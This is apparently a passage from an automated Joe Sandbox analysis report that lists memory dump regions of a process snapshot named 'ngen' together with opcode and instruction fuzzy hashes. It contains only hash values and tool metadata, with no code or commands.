                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6afde5df36377206f62f5fce020fbd060605da10fc45fa1f2b474b439610aad8
                                                                                                                      • Instruction ID: ffc7a56c5df7ac7d662bb664dac881e76f4ca22355634a58039d7f714af2f765
                                                                                                                      • Opcode Fuzzy Hash: 6afde5df36377206f62f5fce020fbd060605da10fc45fa1f2b474b439610aad8
                                                                                                                      • Instruction Fuzzy Hash: B741E475601714CFCB21EF29C94AB65BBF2FF44320F148169D9169B6A3EB309941EF41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d5f3c521ac3c0d53384618bb1034e52f49b99de4d9e9710d07902c21710539f5
                                                                                                                      • Instruction ID: 4a20b6b5674a676090f5d6703e5de27422c6be8099af4b47a80e8ee303e4e88a
                                                                                                                      • Opcode Fuzzy Hash: d5f3c521ac3c0d53384618bb1034e52f49b99de4d9e9710d07902c21710539f5
                                                                                                                      • Instruction Fuzzy Hash: 04416171A143549FD720DF29C849B9BBBE8FF88754F004A2EF998D7250DB709904DB92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c699ba089dce34bd9f7610a46c5f65c1750c2913e4f2b2179c1df4d50fec31a9
                                                                                                                      • Instruction ID: 1f091af190e910545cc89eafceffdf8632f9c6ff8f0ac3d4114ef593a7fbd15e
                                                                                                                      • Opcode Fuzzy Hash: c699ba089dce34bd9f7610a46c5f65c1750c2913e4f2b2179c1df4d50fec31a9
                                                                                                                      • Instruction Fuzzy Hash: 6141D0726087459FD320DF69D848BABB7E9BFC8700F040A29F89587680E770E914D7A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 76f99e041af726aabec3df3ffc52304509094e22cbd38c48c427ee42a439fa80
                                                                                                                      • Instruction ID: a80e74c7d6975623191674b084624aa89fbd42b590cf9f8a8a4fa6687ebcbf25
                                                                                                                      • Opcode Fuzzy Hash: 76f99e041af726aabec3df3ffc52304509094e22cbd38c48c427ee42a439fa80
                                                                                                                      • Instruction Fuzzy Hash: 9A31B035311A06EFCB55AB24C989EA9FBA6FF44364F405025E94187A51DB70E920EFD0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction ID: 9b724c7c38f03051e356cabb448f5f29634ac27e927481115e80e5a7c4d9756c
                                                                                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                                      • Instruction Fuzzy Hash: EF31FC3171C3419BDB21DA28C804B67BBD6BB85764F08852DFC868B380E3B4DC41E7A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6d115197051b6095ed42890502760250b29e158682ad4ea97e9bdee9fec895ba
                                                                                                                      • Instruction ID: e5d5a9a9ce5df421364be115eaa9729fcf5c3b383b47b0a163ebf3d7da885ad6
                                                                                                                      • Opcode Fuzzy Hash: 6d115197051b6095ed42890502760250b29e158682ad4ea97e9bdee9fec895ba
                                                                                                                      • Instruction Fuzzy Hash: 0931F1726002149FC721EF15C884A667BA6FF84360F14826DFC494F291DB31ED42DBD0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c11ce3a8b625ba38b84dfa44c756de6ef5340d44597f4175dbba164bc41528b9
                                                                                                                      • Instruction ID: fb66450835a8c9e8f0a2be7c1dfa259dec0bf17090bdf32552aef255712672f8
                                                                                                                      • Opcode Fuzzy Hash: c11ce3a8b625ba38b84dfa44c756de6ef5340d44597f4175dbba164bc41528b9
                                                                                                                      • Instruction Fuzzy Hash: CF31B076A00219EBDB15DFA8CC84FAEB7B6FB48B40F454169E901EB344D770AD40DBA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 71cf99629d8a5d50a1753a634591cd2da045561d0f252cc631dff0eec44102b6
                                                                                                                      • Instruction ID: ea6bb4814f7e9044dc486f9a8f1aa0259f67aa4fb5e60234d4ccc62b70fceff4
                                                                                                                      • Opcode Fuzzy Hash: 71cf99629d8a5d50a1753a634591cd2da045561d0f252cc631dff0eec44102b6
                                                                                                                      • Instruction Fuzzy Hash: 4B21D776A407249FC3329F59C404B2ABBF5FF94B50F190429EA559B740DB74EC41EB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cdc5536589b225423354058429f74074600b4bc7f9adebe59561e8a12a80770f
                                                                                                                      • Instruction ID: 718f1454244766167c6088c24c77dfb80dc4d8d155b9f50bf383dd2314396d83
                                                                                                                      • Opcode Fuzzy Hash: cdc5536589b225423354058429f74074600b4bc7f9adebe59561e8a12a80770f
                                                                                                                      • Instruction Fuzzy Hash: C231A072A04611DBC712EE28888DEBBBBAAAF84670F014529FC5597211DB30DC11B7E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 057f22e8dda8195345fa4b8d8f3d142950c07b0615c1b7a861a712d7684d01cf
                                                                                                                      • Instruction ID: 7079f9aecb6f2cd89df8085d24f4848196afc26e347647f66d83b37efacb5866
                                                                                                                      • Opcode Fuzzy Hash: 057f22e8dda8195345fa4b8d8f3d142950c07b0615c1b7a861a712d7684d01cf
                                                                                                                      • Instruction Fuzzy Hash: 1531DF71B10615ABDF22DFA9CC54F7EBBBAAF44754F104069EA05DB351DA30EC00AB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4451830e9fa6200e8f049f5b50ea5f3dd5580abc92bcf8f7f4fd4ca7961f257
                                                                                                                      • Instruction ID: 75492998fd93288a558a56357865a53e084e22491f8fdd188b93dd920ebea7c5
                                                                                                                      • Opcode Fuzzy Hash: a4451830e9fa6200e8f049f5b50ea5f3dd5580abc92bcf8f7f4fd4ca7961f257
                                                                                                                      • Instruction Fuzzy Hash: 5931CC716093019FD725DF1AC841B2AB7E5FF88710F04496DF88A9B392D774E804DBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction ID: 0035cdb08f01fe14e74cf3dbba7321294daa821f0583a5c721929edd4a7c6eef
                                                                                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                                      • Instruction Fuzzy Hash: 4031D536604224AFDB31DE54C888F6EB3B9EB84750F198429ED169B350D338DD41EB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3344e55447883df3acc42c825bebc73a3ce8269b1ee66c8e6f5252d170570800
                                                                                                                      • Instruction ID: 1df72a82b1a56d95161007b7c163d8143c0bc037f854a5b8fdc3c4bf640ce8c9
                                                                                                                      • Opcode Fuzzy Hash: 3344e55447883df3acc42c825bebc73a3ce8269b1ee66c8e6f5252d170570800
                                                                                                                      • Instruction Fuzzy Hash: 76319A35715A06FFDB55AB24DA88EA9BBA6FF84320F406025ED0187B51D730E830EF90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction ID: f33e41634a392519ba4d7efe740f4fb62a5c1391989346c06496065c4b92153a
                                                                                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                      • Instruction Fuzzy Hash: 4A313A72B04B00EFD760CF69DE44B57B7F9BB48B50F08492DA99AD3650E630E900DB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction ID: 5d5d06d8533f7e54e41098c499f8f9828a891e143880186f59aa7cf6bfc84064
                                                                                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                                      • Instruction Fuzzy Hash: 27319A35A04206CFC714CF18C480926FBF6FF89310B2485A9E95A9B315EB31FD06DB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 494468229848bbeb5347f5b81ac30c181461c40246864d4ae48048051f53293d
                                                                                                                      • Instruction ID: 8b088efe3c9db4c1918deac1d8bc411028796288910a94c8dae3f6ef02e5d389
                                                                                                                      • Opcode Fuzzy Hash: 494468229848bbeb5347f5b81ac30c181461c40246864d4ae48048051f53293d
                                                                                                                      • Instruction Fuzzy Hash: EF31C032A0112C9BDB31DF15CC45FFEB7BEAB05740F0104A5FA45AB290D674AE80AFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d812d36e4ad28ceef4eb4983371550c8697e0d54d59b43cec44247797d7b3fd4
                                                                                                                      • Instruction ID: 60af924cbf9334fee1557d62c0c5ba76e64d7c7cd9ab784f8ee0d6ea2e7baa35
                                                                                                                      • Opcode Fuzzy Hash: d812d36e4ad28ceef4eb4983371550c8697e0d54d59b43cec44247797d7b3fd4
                                                                                                                      • Instruction Fuzzy Hash: 8531D6756402109BCB31BF18C849BB97BB5BF40314F54C1A9EC469B382EB749986EB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                      • Instruction ID: feada7bc9d4ecf962bbc28ff3fb1571caf07d17c55f5c7d1f880c416e844727f
                                                                                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                      • Instruction Fuzzy Hash: C1217F32B00608EBCF15CF98C9C4A8EBBB6FF48714F108069ED159F241D671EA05EB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 368ea9ed918869d360bacfdadadd5dd29256d6af83a4057bd2d243285220078e
                                                                                                                      • Instruction ID: 55c8a4ed9834c2ceda2db9f8dbf9f60c7acc54f27203c8e957b82bdad1e9c87c
                                                                                                                      • Opcode Fuzzy Hash: 368ea9ed918869d360bacfdadadd5dd29256d6af83a4057bd2d243285220078e
                                                                                                                      • Instruction Fuzzy Hash: 1F21D5726047459BCF21DF19C884B6B77E6FF88760F044A29FC559B241D770EA00DBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8e80bc5d0ab8d093d57c97c9fc1c837beb2f98875fc7256a17f8dbd5cc71e465
                                                                                                                      • Instruction ID: 99e564718012aba1095c7b3b001cc66d977105d11bfb18bac1bf0e4884fb5c63
                                                                                                                      • Opcode Fuzzy Hash: 8e80bc5d0ab8d093d57c97c9fc1c837beb2f98875fc7256a17f8dbd5cc71e465
                                                                                                                      • Instruction Fuzzy Hash: 20317F76600205EFCB14CF58C888DAEB7BAFFC4304B154959EC0A9B391EB71EA50DB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: da7c607e5a5bcd7a3082be94cdc33dff14b0e46ee6ae37ffd4bf9097fcd323ae
                                                                                                                      • Instruction ID: ae34427855aa0f515f7d55b5180229bd378b6f88e11337d2f0df2279bb7673e1
                                                                                                                      • Opcode Fuzzy Hash: da7c607e5a5bcd7a3082be94cdc33dff14b0e46ee6ae37ffd4bf9097fcd323ae
                                                                                                                      • Instruction Fuzzy Hash: C021D3727142509BC620EF69D94CF167FE9EB85654F400925FE05D7690EF30DC44EBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b220ffc39c2404dbbeef715b7b0c2316a1444c3957698fce727303a7bb0a353c
                                                                                                                      • Instruction ID: c768bb9c44886713156c9615c0d17b215851dd5557fbc731dcfedab3dbd6ffd6
                                                                                                                      • Opcode Fuzzy Hash: b220ffc39c2404dbbeef715b7b0c2316a1444c3957698fce727303a7bb0a353c
                                                                                                                      • Instruction Fuzzy Hash: 2311A572A00715ABCB21EF59E9C4B5EFBB8FF44750F900455DD05A7241DB30ED41AB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                      • Instruction ID: 86db600d234a2f86c7772b7017bc68d97986c5978e78b961f9176aa42e4e7f24
                                                                                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                      • Instruction Fuzzy Hash: B41125323056C29BEB279B29E84CF243799FB01764F1900E0DD01C7641F378C942EA21
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e2792e70558d1cdba23794edf889db3f5aca552672e64d3d9ca88afc06c16690
                                                                                                                      • Instruction ID: 631869181d7ff56b6018aa93b7050d62df0e99c7fa42ad19d484a9f3f3e37461
                                                                                                                      • Opcode Fuzzy Hash: e2792e70558d1cdba23794edf889db3f5aca552672e64d3d9ca88afc06c16690
                                                                                                                      • Instruction Fuzzy Hash: E4118B32241640EFCB15EF19CD89F56BBB8FF88B94F200465ED059B6A1D635ED01DA90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                      • Instruction ID: 918bab6dfe02c2f1786efff84857a66b126a7757bcaf2a5d013a5ae9f4e9a7de
                                                                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                      • Instruction Fuzzy Hash: 330124372002108BDF10AA29D884FA67767BFC4720F1944E5ED068F257EA71CC81E7A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ac7f8c9c213c8d4a9de64c1f430e39eb5e6459c6dd3b75b2b57b8771c0885758
                                                                                                                      • Instruction ID: ae9c080ec9ccb18028a87aa31322e091c3bfd09dc6370aba00da0168689c8984
                                                                                                                      • Opcode Fuzzy Hash: ac7f8c9c213c8d4a9de64c1f430e39eb5e6459c6dd3b75b2b57b8771c0885758
                                                                                                                      • Instruction Fuzzy Hash: EB016772301554BFC711BB79CD8CE57BBACFF85660B000625B60987A91DB64EC51DAE0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                      • Instruction ID: 4ff98d67190e206f754bcc859e333ae270284a18e6fffdba3d50be9127989bd5
                                                                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                      • Instruction Fuzzy Hash: 46012832200704AFDB32E666C804EBB73EEFFC4350F04481AAA468B580DE70E845EB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29bb60a6aafb7a94877923f0f993a21784c5dad816f265378d72b41b74298c7f
                                                                                                                      • Instruction ID: 58298208aa625498f2e2c084b8ba048d477b48630ab94aeee2dc420280b4f93e
                                                                                                                      • Opcode Fuzzy Hash: 29bb60a6aafb7a94877923f0f993a21784c5dad816f265378d72b41b74298c7f
                                                                                                                      • Instruction Fuzzy Hash: E1115B35A1120CAFDF05DF64D859EAE7BB6BB44340F004059F91597250EB35AE11EB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                      • Instruction ID: 262159254b490ff598e2acfdf43753c4de4116b5fc2342d83792c7a41964f2db
                                                                                                                      • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                      • Instruction Fuzzy Hash: 9711AD32500B21DFD7219F15C880B22B3E5FF40B62F19886CD5994A5A6C374E8C0EB10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1c64fd5d4bd28027c67df5df73f5f3791b306cb9807175c764b14faec14b4094
                                                                                                                      • Instruction ID: 656a9c764da9e5a7c71896478d66aa7a89cba03de70930e1fe0659d81d78cc37
                                                                                                                      • Opcode Fuzzy Hash: 1c64fd5d4bd28027c67df5df73f5f3791b306cb9807175c764b14faec14b4094
                                                                                                                      • Instruction Fuzzy Hash: 5E015E71A11348ABDF14EF69E849FAEBBB8EF45700F004466F904EB280DA74DA01DB95
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d99f9ee5bff3202c17cb67bfcf2fdabb55734dddb607d484717a7c535b77097d
                                                                                                                      • Instruction ID: abd8c8bbd687fdac36d18fea62ef58d159f35f2157fe34f1989fcf94853e321a
                                                                                                                      • Opcode Fuzzy Hash: d99f9ee5bff3202c17cb67bfcf2fdabb55734dddb607d484717a7c535b77097d
                                                                                                                      • Instruction Fuzzy Hash: 55019E71A1134CABCF04EFA9D849FAEBBB8EF44310F004026B900EB280DA74DA01DB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                      • Instruction ID: 92f3976cffa5f063a8c66b3edd69a76c300ce925d5657b06c7ba9c8e775d2efb
                                                                                                                      • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                      • Instruction Fuzzy Hash: A401F772B252049FDB21DA54E808F6573AAFFC5724F104115FE158B280EB34DD41EB91
                                                                                                                      Memory Dump Source
